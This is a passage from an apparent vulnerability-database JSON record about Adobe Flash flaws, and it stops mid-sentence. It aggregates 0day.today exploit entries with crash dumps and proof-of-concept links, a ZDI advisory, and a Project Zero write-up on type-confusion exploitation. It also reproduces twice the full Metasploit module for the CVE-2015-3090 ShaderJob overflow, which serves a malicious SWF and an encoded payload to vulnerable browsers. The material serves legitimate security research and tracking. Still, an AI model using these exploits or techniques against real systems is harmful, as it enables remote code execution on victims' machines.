(KB3021953) installed. It does not work in IE11 EPM as it needs to write normally to the temporary folder to setup the junction.\r\n \r\n2. Credit\r\nJietao Yang of KeenTeam (@K33nTeam) is credited for the vulnerability.\r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37840.zip\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24089"}, {"lastseen": "2018-01-05T03:22:44", "edition": 2, "description": "Exploit for windows platform in category remote exploits", "published": "2015-08-19T00:00:00", "type": "zdt", "title": "Flash Broker-Based Sandbox Escape via Unexpected Directory Lock Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3083"], "modified": "2015-08-19T00:00:00", "id": "1337DAY-ID-24088", "href": "https://0day.today/exploit/description/24088", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=279&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n \r\nFlashBroker - Junction Check Bypass With Locked Directory IE PM Sandbox Escape\r\n \r\n1. Windows 8.1 Internet Explorer Protected Mode Bypass in FlashBroker\r\n \r\nFlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions.\r\n \r\nThere is a bad check in FlashBroker BrokerCreateFile method and BrokerMoveFileEx method. FlashBroker uses CreateFile to open the destination folder for check. If CreateFile fails, the destination will be considered as a valid path. However, FlashBroker uses dwShareMode as 0 in CreateFile, which make CreateFile always fail if handle of the destination folder is held by other.\r\n \r\nThe PoC writes calc.bat to startup folder. It has been tested by injecting the dll into 32-bit low integrity level IE process with Adobe Flash Player 16.0.0.305 (KB3021953) installed. It does not work in IE11 EPM as it needs to write normally to the temporary folder to setup the junction.\r\n \r\n2. Credit\r\nJietao Yang and Jihui Lu of KeenTeam (@K33nTeam) is credited for the vulnerability.\r\n \r\nProof of Concept:\r\n \r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37841.zip\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24088"}, {"lastseen": "2018-01-27T01:06:58", "edition": 2, "description": "Exploit for windows platform in category dos / poc", "published": "2015-08-19T00:00:00", "type": "zdt", "title": "Flash Uninitialized Stack Variable MPD Parsing Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3089"], "modified": "2015-08-19T00:00:00", "id": "1337DAY-ID-24083", "href": "https://0day.today/exploit/description/24083", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=316&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n \r\n[Tracking for: https://code.google.com/p/chromium/issues/detail?id=472201]\r\n \r\nCredit is to bilou, working with the Chromium Vulnerability Rewards Program.\r\n \r\n---\r\nVULNERABILITY DETAILS\r\nLoading a weird MPD file can corrupt flash player's memory.\r\n \r\nVERSION\r\nChrome version 41.0.2272.101, Flash 17.0.0.134\r\nOperating System: Win 7 x64 SP1\r\n \r\nREPRODUCTION CASE\r\nI'm ripping most of this from scarybeasts' sources. I'm sure he's ok with that =D.\r\n \r\n\"To reproduce, host the attached SWF and other files on a web server (e.g. localhost) and load it like this:\"\r\n \r\n\"http://localhost/PlayManifest.swf?file=gen.mpd\r\n \r\n\"To compile the .as file, I had to use special flags to flex:\"\r\n \r\n\"mxmlc -target-player 14.0 -swf-version 25 -static-link-runtime-shared-libraries ./PlayManifest.as\"\r\n\"(This also requires that you have v14.0 of playerglobals.swc installed. Any newer version should also be fine.)\"\r\n \r\n \r\nOn Win7 x64 sp1 with Chrome 32 bit, crash like this:\r\n6AA8B67C | 8B C3 | mov eax,ebx |\r\n6AA8B67E | E8 A1 05 00 00 | call pepflashplayer.6AA8BC24 |\r\n6AA8B683 | EB A8 | jmp pepflashplayer.6AA8B62D |\r\n6AA8B685 | 89 88 D0 00 00 00 | mov dword ptr ds:[eax+D0],ecx | // crash here, eax points somewhere in pepflashplayer.dll\r\n6AA8B68B | 8B 88 88 00 00 00 | mov ecx,dword ptr ds:[eax+88] |\r\n6AA8B691 | 33 D2 | xor edx,edx |\r\n6AA8B693 | 3B CA | cmp ecx,edx |\r\n6AA8B695 | 74 07 | je pepflashplayer.6AA8B69E |\r\n6AA8B697 | 39 11 | cmp dword ptr ds:[ecx],edx |\r\n6AA8B699 | 0F 95 C1 | setne cl |\r\n \r\n \r\nAt first sight this looks to be an uninitialized stack variable but I might be wrong.\r\n---\r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37845.zip\n\n# 0day.today [2018-01-26] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/24083"}, {"lastseen": "2018-01-05T11:18:12", "edition": 2, "description": "Exploit for windows platform in category remote exploits", "published": "2015-08-19T00:00:00", "type": "zdt", "title": "Flash Broker-Based Sandbox Escape via Timing Attack Against File Moving Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3081"], "modified": "2015-08-19T00:00:00", "id": "1337DAY-ID-24087", "href": "https://0day.today/exploit/description/24087", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/24087"}], "packetstorm": [{"lastseen": "2016-12-05T22:12:47", "description": "", "published": "2015-06-19T00:00:00", "type": "packetstorm", "title": "Adobe Flash Player ShaderJob Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3090"], "modified": "2015-06-19T00:00:00", "id": "PACKETSTORM:132383", "href": "https://packetstormsecurity.com/files/132383/Adobe-Flash-Player-ShaderJob-Buffer-Overflow.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player ShaderJob Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow vulnerability related to the ShaderJob workings on \nAdobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the \nsame Bitmap object as src and destination of the ShaderJob. Modifying the \"width\" attribute \nof the ShaderJob after starting the job it's possible to create a buffer overflow condition \nwhere the size of the destination buffer and the length of the copy are controlled. This \nmodule has been tested successfully on: \n* Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169. \n* Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169. \n* Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169. \n* Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Chris Evans', # Vulnerability discovery \n'Unknown', # Exploit in the wild \n'juan vazquez' # msf module \n], \n'References' => \n[ \n['CVE', '2015-3090'], \n['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-09.html'], \n['URL', 'https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html'], \n['URL', 'http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html'], \n['URL', 'http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/'] \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'Platform' => ['win', 'linux'], \n'Arch' => [ARCH_X86], \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:arch => ARCH_X86, \n:os_name => lambda do |os| \nos =~ OperatingSystems::Match::LINUX || \nos =~ OperatingSystems::Match::WINDOWS_7 || \nos =~ OperatingSystems::Match::WINDOWS_81 \nend, \n:ua_name => lambda do |ua| \ncase target.name \nwhen 'Windows' \nreturn true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF \nwhen 'Linux' \nreturn true if ua == Msf::HttpClients::FF \nend \n \nfalse \nend, \n:flash => lambda do |ver| \ncase target.name \nwhen 'Windows' \nreturn true if ver =~ /^17\\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.169') \nwhen 'Linux' \nreturn true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.457') \nend \n \nfalse \nend \n}, \n'Targets' => \n[ \n[ 'Windows', \n{ \n'Platform' => 'win' \n} \n], \n[ 'Linux', \n{ \n'Platform' => 'linux' \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => 'May 12 2015', \n'DefaultTarget' => 0)) \nend \n \ndef exploit \n@swf = create_swf \n \nsuper \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"Request: #{request.uri}\") \n \nif request.uri =~ /\\.swf$/ \nprint_status('Sending SWF...') \nsend_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) \nreturn \nend \n \nprint_status('Sending HTML...') \nsend_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) \nend \n \ndef exploit_template(cli, target_info) \nswf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\" \ntarget_payload = get_payload(cli, target_info) \nb64_payload = Rex::Text.encode_base64(target_payload) \nos_name = target_info[:os_name] \n \nif target.name =~ /Windows/ \nplatform_id = 'win' \nelsif target.name =~ /Linux/ \nplatform_id = 'linux' \nend \n \nhtml_template = %Q|<html> \n<body> \n<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" /> \n<param name=\"movie\" value=\"<%=swf_random%>\" /> \n<param name=\"allowScriptAccess\" value=\"always\" /> \n<param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" /> \n<param name=\"Play\" value=\"true\" /> \n<embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/> \n</object> \n</body> \n</html> \n| \n \nreturn html_template, binding() \nend \n \ndef create_swf \npath = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3090', 'msf.swf') \nswf = ::File.open(path, 'rb') { |f| swf = f.read } \n \nswf \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/132383/adobe_flash_shader_job_overflow.rb.txt"}], "metasploit": [{"lastseen": "2020-10-12T20:35:42", "description": "This module exploits a buffer overflow vulnerability related to the ShaderJob workings on Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the same Bitmap object as src and destination of the ShaderJob. Modifying the \"width\" attribute of the ShaderJob after starting the job it's possible to create a buffer overflow condition where the size of the destination buffer and the length of the copy are controlled. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169, Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169, and Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.\n", "published": "2015-06-18T17:36:14", "type": "metasploit", "title": "Adobe Flash Player ShaderJob Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3090"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/BROWSER/ADOBE_FLASH_SHADER_JOB_OVERFLOW", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player ShaderJob Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow vulnerability related to the ShaderJob workings on\n Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the\n same Bitmap object as src and destination of the ShaderJob. Modifying the \"width\" attribute\n of the ShaderJob after starting the job it's possible to create a buffer overflow condition\n where the size of the destination buffer and the length of the copy are controlled. This\n module has been tested successfully on:\n\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169,\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169,\n Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169, and\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Chris Evans', # Vulnerability discovery\n 'Unknown', # Exploit in the wild\n 'juan vazquez' # msf module\n ],\n 'References' =>\n [\n ['CVE', '2015-3090'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-09.html'],\n ['URL', 'https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html'],\n ['URL', 'http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html'],\n ['URL', 'http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/']\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => ['win', 'linux'],\n 'Arch' => [ARCH_X86],\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :arch => ARCH_X86,\n :os_name => lambda do |os|\n os =~ OperatingSystems::Match::LINUX ||\n os =~ OperatingSystems::Match::WINDOWS_7 ||\n os =~ OperatingSystems::Match::WINDOWS_81\n end,\n :ua_name => lambda do |ua|\n case target.name\n when 'Windows'\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF\n when 'Linux'\n return true if ua == Msf::HttpClients::FF\n end\n\n false\n end,\n :flash => lambda do |ver|\n case target.name\n when 'Windows'\n return true if ver =~ /^17\\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.169')\n when 'Linux'\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.457')\n end\n\n false\n end\n },\n 'Targets' =>\n [\n [ 'Windows',\n {\n 'Platform' => 'win'\n }\n ],\n [ 'Linux',\n {\n 'Platform' => 'linux'\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2015-05-12',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n print_status('Sending SWF...')\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n os_name = target_info[:os_name]\n\n if target.name =~ /Windows/\n platform_id = 'win'\n elsif target.name =~ /Linux/\n platform_id = 'linux'\n end\n\n html_template = %Q|<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\n <param name=\"Play\" value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n |\n\n return html_template, binding()\n end\n\n def create_swf\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3090', 'msf.swf')\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\n\n swf\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb"}], "zdi": [{"lastseen": "2020-06-22T11:40:57", "bulletinFamily": "info", "cvelist": ["CVE-2015-3085"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the BrokerCreateFile method. An attacker can force BrokerCreateFile to traverse the path of the output file, allowing the file to be written anywhere on disk. An attacker can leverage this vulnerability to execute code at medium integrity.", "modified": "2015-06-22T00:00:00", "published": "2015-05-12T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-216/", "id": "ZDI-15-216", "title": "(Pwn2Own) Adobe Flash Player BrokerCreateFile Broker Method Path Traversal Sandbox Escape Vulnerability", "type": "zdi", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:21:18", "bulletinFamily": "info", "cvelist": ["CVE-2015-3077"], "description": " \n\n\nPosted by Natalie Silvanovich, Dazed and (Type) Confused\n\n \n\n\nFor some attackers, it is important that an exploit be extremely reliable. That is to say, the exploit should consistently lead to code execution when it is run on a system with a known platform and Flash version. One way to create such an exploit is to use an especially high-quality bug. This post describes the exploitation of one such bug, and the factors that make it especially good for reliable exploitation.\n\n## The Bug\n\n \n\n\n[CVE-2015-3077](<https://code.google.com/p/google-security-research/issues/detail?id=254>) is a type confusion issue in the Adobe Flash [Button](<http://help.adobe.com/en_US/AS2LCR/Flash_10.0/help.html?content=00002850.html>) and [MovieClip](<http://help.adobe.com/en_US/AS2LCR/Flash_10.0/help.html?content=00002850.html>) filters setters that allows any [filter type](<http://help.adobe.com/en_US/AS2LCR/Flash_10.0/help.html?content=00002850.html>) to be confused with any other filter type. I reported it to Adobe in early February 2015 and it was fixed in May. The bug occurs due to the ability of an attacker to overwrite the constructor that is used to initialize a filter object. An example of code that manifests the issue is below:\n\nvar filter = new flash.filters.BlurFilter();\n\nobject.filters = [filter];\n\nvar e = flash.filters.ConvolutionFilter;\n\nflash[\"filters\"] = [];\n\nflash[\"filters\"][\"BlurFilter\"] = e;\n\nvar f = object.filters;\n\nvar d = f[0];\n\n \n\n\nThis code is somewhat confusing because of its use of operator [], which is necessary for it to compile in Flash CS. Logically equivalent code (which is not guaranteed to compile) is below:\n\n \n\n\nvar filter = new flash.filters.BlurFilter();\n\nobject.filters = [filter];\n\nflash.filters.BlurFilter = flash.filters.ConvolutionFilter;\n\nvar f = object.filters;\n\nvar d = f[0];\n\n \n\n\nThis code sets the filters field of object, a Button or MovieClip to a BlurFilter, which is then stored natively by Flash. The BlurFilter constructor is then overwritten by the ConvolutionFilter constructor. Then the filters getter is called and an ActionScript object to hold the native BlurFilter is constructed, however, the constructor has been overwritten, so the ConvolutionFilter constructor is called. This leads to an object of type ConvolutionFilter that is backed by a native BlurFilter being returned.\n\n \n\n\nThe end result of this is that the fields of the ConvolutionFilter can be accessed (read or written) as if it was a BlurFilter, and likewise for any other filter type. This allows a wide array of manipulation that is useful for exploitation.\n\n \n\n\nThe following diagram shows the layout in memory of the native objects that can potentially be confused using this vulnerability in 64-bit Linux.\n\n \n\n\n\n\nAS2 Filter Types\n\n \n\n\nIn two situations, pointers line up with integers or floats that can be manipulated, which means that pointers can be read and written directly. Also, since the fields of the objects are ordered and sized based on the class definition, they are always in an expected location, so reading and writing will never fail. These properties are important in making the exploit reliable.\n\n## The Exploit\n\n \n\n\nSince exploiting this issue would likely require triggering the type confusion issue many times, I started off by creating a utility function that performed the type confusion, [FilterConfuse.confuse](<https://google-security-research.googlecode.com/issues/attachment?aid=2540007004&name=FilterConfuse.as&token=ABZ6GAc7Qsyk4Y_N_ynOVFbyP3ihNikFzA%3A1437425026348&id=254&mod_ts_token=ABZ6GAf7eGPSchulY1T28GmW66prO8SSuw%3A1437425026348>). It also performs some cleanup, such as setting the ActionScript filter constructors back to normal so that the vulnerable function can be called multiple times without impacting the behaviour of ActionScript outside of the function. \n\n \n\n\nThe first step was to bypass ASLR by determining the address of a vtable. An ideal way to do this would be to confuse an object with a vtable with an object with a member overlapping the vtable that can be manipulated, but all filter objects have vtables at the same offset. Instead, I used the [BitmapData object](<http://help.adobe.com/en_US/AS2LCR/Flash_10.0/help.html?content=00001012.html>) in DisplacementMapFilter to determine the vtable address. \n\n \n\n\nTo determine the location in memory of the BitmapData object, I confused the DisplacementMapFilter with a BevelFilter. This caused the BitmapData pointer stored in the DisplacementMapFilter to line up with the color properties ([shadowColor](<http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/filters/BevelFilter.html#shadowColor>), [shadowAlpha](<http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/filters/BevelFilter.html#shadowAlpha>), [highlightColor](<http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/filters/BevelFilter.html#highlightColor>) and[ highlightAlpha](<http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/filters/BevelFilter.html#highlightAlpha>)) of the BevelFilter. These properties are backed by two 32-bit integers (shown as scolor and hcolor above and below), and the color properties access the bottom 24 bits of each integer while the alpha properties access the top 8 bits. Reading these properties and combining them using bitwise arithmetic, it is possible to extract the exact address of the BitmapData object.\n\n \n\n\n\n\nRetrieving the BitmapData pointer\n\n \n\n\nNext, we need to read the vtable out of the top of the BitmapData object. To do this, I used the [matrix](<http://help.adobe.com/en_US/AS2LCR/Flash_10.0/help.html?content=00000956.html>) property of the ConvolutionFilter object. This property is stored as a pointer to an array of floats that are allocated when the property is set, and an ActionScript array containing these floats is returned when the property is retrieved. By setting the matrix pointer to the BitmapData object, it is possible to read out the contents of this object in memory as an array of floats.\n\n \n\n\nTo set the pointer, I confused a ConvolutionFilter object with a DisplacementMapFilter object (not the same DisplacementMapFilter as used above!) and set the [mapPoint](<http://help.adobe.com/en_US/AS2LCR/Flash_10.0/help.html?content=00001013.html>) property to the pointer location of the BitmapData object above. The mapPoint property is a point with x and y coordinates that are both integers (p_x and p_y in the figure below) that line up with the matrix pointer in the ConvolutionFilter, which made it easy enough to set this value. It was then possible to read the vtable from the BitmapData object by reading the matrix array from the ConvolutionFilter object (note that the object had to be confused to a DisplacementBitmapFilter and then confused back to a ConvolutionFilter to allow this).\n\n \n\n\n\n\nRetrieving the vtable pointer value\n\n \n\n\nAt this point, it becomes more difficult to make this exploit reliable due to the use of floats. The vtable_low and vtable_high values are read from the ConvolutionFilter matrix as floats, as that is the array type, but unfortunately, not every possible valid value of a pointer is also a valid float. This means it\u2019s possible that reading the value will lead to NaN, or worse, a numeric value that is not quite correct. \n\n \n\n\nThe ideal solution to this problem would be to access vtable_high and vtable_low through a getter that interprets them as integers, but one is not available, as filter members tend to be floats due to the nature of their functionality.\n\n \n\n\nFortunately, though, the AS2 virtual machine is lazy with regards to interpreting floats-- it only converts a value in memory to a float when an operation in ActionScript is performed on it. Native operations generally do not cause floats to be interpreted, unless the specific operation, such as arithmetic requires it. This means that when a float from the matrix array is copied to vtable_low or vtable_high, it will maintain its value in memory, even if it is invalid for a float, until the variable it was copied to is actually used in ActionScript, or has arithmetic performed on it in native code. So if the variable value is immediately type confused to a different type that supports a full range of 32-bit values, such as an int, it is guaranteed that it will be the same value as the original value in memory of the matrix array. So to avoid introducing unreliability into the exploit, it is necessary to perform this type confusion before manipulating any floats in ActionScript.\n\n \n\n\nTo do this, I wrote a conversion class, [FloatConverter](<https://google-security-research.googlecode.com/issues/attachment?aid=2540007002&name=FloatConverter.as&token=ABZ6GAfXEi0x5mXpjfeaqeLZ7XWBWJP7qQ%3A1437425026348&id=254&mod_ts_token=ABZ6GAeak9X7TKftuYL3FSxAQg4cA_2NSQ%3A1437425026348>), that uses type confusion in filters to implement integer-to-float and float-to-integer functions. It confuses the ColorMatrixFilter [matrix](<http://help.adobe.com/en_US/AS2LCR/Flash_10.0/help.html?content=00000918.html>) property (not to be confused with the ConvolutionFilter matrix property) which is a series of inline floats with the GlowFilter [color](<http://help.adobe.com/en_US/AS2LCR/Flash_10.0/help.html?content=00001080.html>) and [alpha](<http://help.adobe.com/en_US/AS2LCR/Flash_10.0/help.html?content=00001076.html>) properties, which access different bytes of an int.\n\n \n\n\n\n\nFloat converter\n\n \n\n\nWhile this implements reliable float-to-int conversion, unfortunately, it is not reliable for int-to-float. The way the the color array in the ColorMatrix filter is accessed in ActionScript, the entire array is copied, even if only the first element is accessed. When the array is copied, each element is converted to a Number, which sometimes involves accessing pointers (for example, calling valueOf on an object). Since the color array is longer than the entire GlowFilter class, it extends onto the heap when confused with a GlowFilter. This means that conversion could occur on unknown values on the heap, possibly leading to crashes if they reference invalid pointers when being converted to Numbers. So for int-to-float, I implemented a float converter (below) that uses a different confusion in ConvolutionFilter and DisplacementMapFilter that is a direct cast, and does not cause any unknown values on the heap to be accessed.\n\n\n\nAlternate float converter\n\n \n\n\nThis solves the problem of crashes due to accessing unknown heap values, but unfortunately, there is one more issue with reliability in this exploit relating to floats. It occurs due to the implementation of the ConvolutionFilter matrix getter. In ActionScript 2, all numeric values are stored as type Number, which is a union between an integer and a pointer to a double. The native ConvolutionFilter matrix is stored as an array of floats, but it is copied into an ActionScript array so that it can be accessed in ActionScript when the matrix getter is called, and its values are cast to doubles in the process. Then, when the float converter is called on the values, they are cast back to floats.\n\n \n\n\nCasting a float to a double and back generally conserves its value, except in one specific case, if the float value is an SNaN. According to the floating point specification, there are two types of NaNs, quiet NaNs (QNaNs) and signalling NaNs (SNaNs). QNaNs do nothing if they occur, but SNaNs throw a floating point exception in some situations. In x86, casting a double to a float always results in a QNaN (even if the double resulted from an SNaN) to avoid unexpected exceptions.\n\n \n\n\nSo if the lower bits of a pointer happen to be an SNaN, it will be converted to a QNaN, which means that one bit (the first bit of the mantissa, bit 22) will be set when it shouldn\u2019t be. This problem is avoidable when the vtable is being read-- the third byte of the pointer, which contains the bit that gets flipped can be read unaligned to verify what its real value is. So the code will do an unaligned read (by performing the read of the vtable a second time with the Bitmap pointer incremented by one) and correct the int value if the float happens to be an SNaN.\n\n \n\n\nUsing the float converters implemented above, the vtable address can then be converted to an integer. Now we need to gain code execution using this address. An easy way to move the instruction pointer is to overwrite a vtable of an object (or a pointer to an object that has a vtable). This can be done by confusing the ConvolutionFilter matrix array with the DisplacementFilter BitmapData pointer.\n\n \n\n\nBitmapData objects consist of a series of native backing objects. The ActionScript object contains a pointer to a BitmapData native object, which then contains pointers to other native objects. One such object is the bits object, which contains the actual bitmap bits. This bits object contains many virtual methods which are often the first methods called when any action is performed on the BitmapData object. To take advantage of this, the exploit creates a fake BitmapData object with a pointer to a fake bits object, and then calls a method which will lead to a virtual method call on the fake bits object.\n\n \n\n\nThe ConvolutionFilter.matrix property can be used to allocate a buffer of floats of any size via its setter as described above. The location of this buffer can then be determined by confusing the ConvolutionFilter with a DisplacementMapFilter and using the DisplacementMapFilter mapPoint property, similar to what was done to read the vtable location. Since the allocated arrays are immutable, it is necessary to first create a fake vtable object and then a fake bits object pointing to the vtable, and then create a fake bitmap pointing to it. \n\n \n\n\nThe first step is creating a fake vtable and determining its address using ConvolutionFilter/DisplacementMapFilter confusion.\n\n \n\n\n\n\nCreating a fake vtable\n\n \n\n\nThen, fake bitmap bits can be created and retrieved using the same method. \n \n\n\n\n\nCreating a fake Bitmap Bits\n\n \n\n\nFinally, a fake Bitmap pointing to the bits is created. \n\n \n\n\n\n\nCreating a fake Bitmap\n\n \n\n\nA reference to the fake bitmap can then be retrieved in ActionScript by setting a DisplacementMapFilter object\u2019s BitmapData object to the pointer to the fake bitmap by confusing it with a BevelFilter, and setting the color properties to the pointer value, the reverse of what was done to read the location of the original BitmapData object the vtable was read out of. This object can then be confused back to a DisplacementMapFilter and the BitmapData object accessed by calling the mapImage getter. Then, whenever a method containing a virtual call (such as setPixel32) is called on the object, the method will call into the location specified in the fake vtable.\n\n \n\n\nAt this point, it\u2019s worth looking into what\u2019s actually in the fake vtable in more detail. The previous discussion of the float converter ignored one issue with SNaNs: writing floats. The ConvolutionFilter.matrix setter also converts floats to doubles and back before writing them, so if a pointer happens to be an SNaN value, and then gets written to the matrix array, bit 23 will get set, even if it is not set in the original value. This can be avoided in a limited way by using unaligned writes.\n\n \n\n\nIn memory, an SNaN pointer is laid out as follows:\n\n \n\n\n00: XX XX YY QQ XX ZZ 00 00\n\n \n\n\nWhere:\n\n \n\n\nXX can be any value from 0 to 0xFF\n\nYY has bit 5 set to zero and no other constraints\n\nQQ has all bits set to one except for bit 7 which can be 1 or 0\n\nZZ is a value with bit 7 set to zero with no other constraints.\n\n \n\n\nIt can be written unaligned as 32-bit floats as follows:\n\n \n\n\n00: 